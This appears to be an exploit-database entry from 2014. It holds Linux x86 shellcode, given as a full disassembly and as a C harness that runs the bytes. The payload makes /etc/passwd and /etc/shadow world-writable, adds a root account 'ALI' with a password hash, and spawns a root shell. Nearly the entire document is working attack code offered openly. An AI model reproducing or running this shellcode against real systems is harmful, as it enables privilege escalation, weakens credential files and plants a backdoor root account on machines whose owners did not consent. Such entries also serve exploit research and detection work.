Linux x86 - chmod 777 /etc/passwd & /etc/shadow, Add New Root User ALI/ALI & Execute /bin/sh

🗓️ 04 Aug 2014 00:00:00Reported by Ali RazmjooType
Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && Add new root user ALI/ALI && Execute /bin/s
/*# Exploit Title: Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Execute /bin/sh 
# Date: 4/8/2014
# Exploit Author: Ali Razmjoo
# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
*/
/*
Ali Razmjoo , [email protected]
Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh 
length: 378 bytes
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')


00000000 <_start>:
   0:	31 c0                	xor    %eax,%eax
   2:	31 db                	xor    %ebx,%ebx
   4:	6a 0f                	push   $0xf
   6:	58                   	pop    %eax
   7:	68 6a 73 77 64       	push   $0x6477736a
   c:	5b                   	pop    %ebx
   d:	c1 eb 08             	shr    $0x8,%ebx
  10:	53                   	push   %ebx
  11:	68 2f 70 61 73       	push   $0x7361702f
  16:	68 2f 65 74 63       	push   $0x6374652f
  1b:	89 e3                	mov    %esp,%ebx
  1d:	68 41 41 ff 01       	push   $0x1ff4141
  22:	59                   	pop    %ecx
  23:	c1 e9 08             	shr    $0x8,%ecx
  26:	c1 e9 08             	shr    $0x8,%ecx
  29:	cd 80                	int    $0x80
  2b:	6a 0f                	push   $0xf
  2d:	58                   	pop    %eax
  2e:	68 6a 64 6f 77       	push   $0x776f646a
  33:	5b                   	pop    %ebx
  34:	c1 eb 08             	shr    $0x8,%ebx
  37:	53                   	push   %ebx
  38:	68 2f 73 68 61       	push   $0x6168732f
  3d:	68 2f 65 74 63       	push   $0x6374652f
  42:	89 e3                	mov    %esp,%ebx
  44:	68 41 41 ff 01       	push   $0x1ff4141
  49:	59                   	pop    %ecx
  4a:	c1 e9 08             	shr    $0x8,%ecx
  4d:	c1 e9 08             	shr    $0x8,%ecx
  50:	cd 80                	int    $0x80
  52:	6a 05                	push   $0x5
  54:	58                   	pop    %eax
  55:	68 41 73 77 64       	push   $0x64777341
  5a:	5b                   	pop    %ebx
  5b:	c1 eb 08             	shr    $0x8,%ebx
  5e:	53                   	push   %ebx
  5f:	68 2f 70 61 73       	push   $0x7361702f
  64:	68 2f 65 74 63       	push   $0x6374652f
  69:	89 e3                	mov    %esp,%ebx
  6b:	68 41 41 01 04       	push   $0x4014141
  70:	59                   	pop    %ecx
  71:	c1 e9 08             	shr    $0x8,%ecx
  74:	c1 e9 08             	shr    $0x8,%ecx
  77:	cd 80                	int    $0x80
  79:	89 c3                	mov    %eax,%ebx
  7b:	6a 04                	push   $0x4
  7d:	58                   	pop    %eax
  7e:	68 41 73 68 0a       	push   $0xa687341
  83:	59                   	pop    %ecx
  84:	c1 e9 08             	shr    $0x8,%ecx
  87:	51                   	push   %ecx
  88:	68 6e 2f 62 61       	push   $0x61622f6e
  8d:	68 3a 2f 62 69       	push   $0x69622f3a
  92:	68 72 6f 6f 74       	push   $0x746f6f72
  97:	68 4c 49 3a 2f       	push   $0x2f3a494c
  9c:	68 3a 30 3a 41       	push   $0x413a303a
  a1:	68 4b 2e 3a 30       	push   $0x303a2e4b
  a6:	68 66 77 55 57       	push   $0x57557766
  ab:	68 68 70 31 50       	push   $0x50317068
  b0:	68 7a 59 65 41       	push   $0x4165597a
  b5:	68 41 61 41 51       	push   $0x51416141
  ba:	68 49 38 75 74       	push   $0x74753849
  bf:	68 50 4d 59 68       	push   $0x68594d50
  c4:	68 54 42 74 7a       	push   $0x7a744254
  c9:	68 51 2f 38 54       	push   $0x54382f51
  ce:	68 45 36 6d 67       	push   $0x676d3645
  d3:	68 76 50 2e 73       	push   $0x732e5076
  d8:	68 4e 58 52 37       	push   $0x3752584e
  dd:	68 39 4b 55 48       	push   $0x48554b39
  e2:	68 72 2f 59 42       	push   $0x42592f72
  e7:	68 56 78 4b 47       	push   $0x474b7856
  ec:	68 39 55 66 5a       	push   $0x5a665539
  f1:	68 46 56 6a 68       	push   $0x686a5646
  f6:	68 46 63 38 79       	push   $0x79386346
  fb:	68 70 59 6a 71       	push   $0x716a5970
 100:	68 77 69 53 68       	push   $0x68536977
 105:	68 6e 54 67 54       	push   $0x5467546e
 10a:	68 58 4d 69 37       	push   $0x37694d58
 10f:	68 2f 41 6e 24       	push   $0x246e412f
 114:	68 70 55 6e 4d       	push   $0x4d6e5570
 119:	68 24 36 24 6a       	push   $0x6a243624
 11e:	68 41 4c 49 3a       	push   $0x3a494c41
 123:	89 e1                	mov    %esp,%ecx
 125:	ba 41 41 41 7f       	mov    $0x7f414141,%edx
 12a:	c1 ea 08             	shr    $0x8,%edx
 12d:	c1 ea 08             	shr    $0x8,%edx
 130:	c1 ea 08             	shr    $0x8,%edx
 133:	cd 80                	int    $0x80
 135:	31 c0                	xor    %eax,%eax
 137:	b0 46                	mov    $0x46,%al
 139:	31 db                	xor    %ebx,%ebx
 13b:	31 c9                	xor    %ecx,%ecx
 13d:	cd 80                	int    $0x80
 13f:	31 c0                	xor    %eax,%eax
 141:	b0 46                	mov    $0x46,%al
 143:	31 db                	xor    %ebx,%ebx
 145:	31 c9                	xor    %ecx,%ecx
 147:	cd 80                	int    $0x80
 149:	68 59 59 59 59       	push   $0x59595959
 14e:	68 58 58 58 58       	push   $0x58585858
 153:	68 2f 73 68 42       	push   $0x4268732f
 158:	68 2f 62 69 6e       	push   $0x6e69622f
 15d:	89 e3                	mov    %esp,%ebx
 15f:	31 c0                	xor    %eax,%eax
 161:	88 43 07             	mov    %al,0x7(%ebx)
 164:	89 5b 08             	mov    %ebx,0x8(%ebx)
 167:	89 43 0c             	mov    %eax,0xc(%ebx)
 16a:	b0 0b                	mov    $0xb,%al
 16c:	8d 4b 08             	lea    0x8(%ebx),%ecx
 16f:	8d 53 0c             	lea    0xc(%ebx),%edx
 172:	cd 80                	int    $0x80
 174:	b0 01                	mov    $0x1,%al
 176:	b3 01                	mov    $0x1,%bl
 178:	cd 80                	int    $0x80

*/

#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\x31\xdb\x6a\x0f\x58\x68\x6a\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x0f\x58\x68\x6a\x64\x6f\x77\x5b\xc1\xeb\x08\x53\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x05\x58\x68\x41\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\x68\x6e\x2f\x62\x61\x68\x3a\x2f\x62\x69\x68\x72\x6f\x6f\x74\x68\x4c\x49\x3a\x2f\x68\x3a\x30\x3a\x41\x68\x4b\x2e\x3a\x30\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\x68\x41\x4c\x49\x3a\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x59\x59\x59\x59\x68\x58\x58\x58\x58\x68\x2f\x73\x68\x42\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
int main(void)
{

    fprintf(stdout,"Length: %d\n\n",strlen(sc));

    (*(void(*)()) sc)();

}
04 Aug 2014 00:00Current
0.2Low risk
Vulners AI Score0.2